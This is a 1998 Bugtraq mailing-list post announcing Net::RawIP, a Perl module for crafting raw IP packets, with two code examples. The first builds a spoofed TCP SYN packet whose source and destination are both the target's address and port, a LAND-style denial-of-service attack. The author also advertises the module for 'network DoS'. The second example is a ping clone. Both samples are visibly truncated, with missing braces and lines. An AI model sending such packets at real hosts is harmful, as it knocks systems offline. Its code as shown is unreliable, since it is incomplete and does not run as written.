[8779] in bugtraq
New perl module Net::RawIP
daemon@ATHENA.MIT.EDU (Sergey V. Kolychev)
Tue Dec 22 16:26:18 1998
Date: Tue, 22 Dec 1998 17:23:38 +0200
Reply-To: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
From: "Sergey V. Kolychev" <ksv@GW.AL.LG.UA>
Good day.
This is my first bugtraq post.
I'm just another perl coder ;). I'm writing module which
can be used for easy manipulating raw ip packets from perl.
This module have optional feature for manipulating ethernet
Also it included interface for libpcap. It can be used for
easy writing port scanners,programs for check security,
network DoS directly from perl ;)
I have test my module only on Linux 2.0.3x with glibc
Just two small examples:
require 'getopts.pl';
use Net::RawIP;
$a = new Net::RawIP;
die "Usage $0 -i <target> -p <target port>" unless ($opt_i && $opt_p);
$a->set({ ip => {saddr => $opt_i,
daddr => $opt_i
tcp=> {dest => $opt_p,
source => $opt_p,
psh => 1,
syn => 1}
use Net::RawIP qw(:pcap);
$a = new Net::RawIP ({icmp =>{}});
$a->set({ip => {saddr => 'ns.al.lg.ua', # insert your site here !
daddr => $ARGV[0]},
icmp => {type => 8, id => $$}
$device = 'eth0'; # insert your device here !
$filt = 'ip proto \\icmp and dst host ns.al.lg.ua';# insert your site here!
$size = 1500;
$tout = 30;
$pcap = $a->pcapinit($device,$filt,$size,$tout);
$i =0;
loop $pcap,-1,\&dmp,\@a;
sleep 2;
$a->set({icmp => {sequence => $i,data => timem()}});
sub dmp{
my $time = timem();
my @ar = $a->get({ip => [qw(ttl)], icmp=>[qw(sequence data)]});
printf("%u bytes from %s: icmp_seq=%u ttl=%u time=%5.1f ms\n",length($ar[2])+8,
Thanks to Pavel Krauz <kra@cri.cz> for hunt,I used some code from it.
Latest version my module available from
Version 0.01 available from CPAN
I will be glad if somebody find my work interesting.
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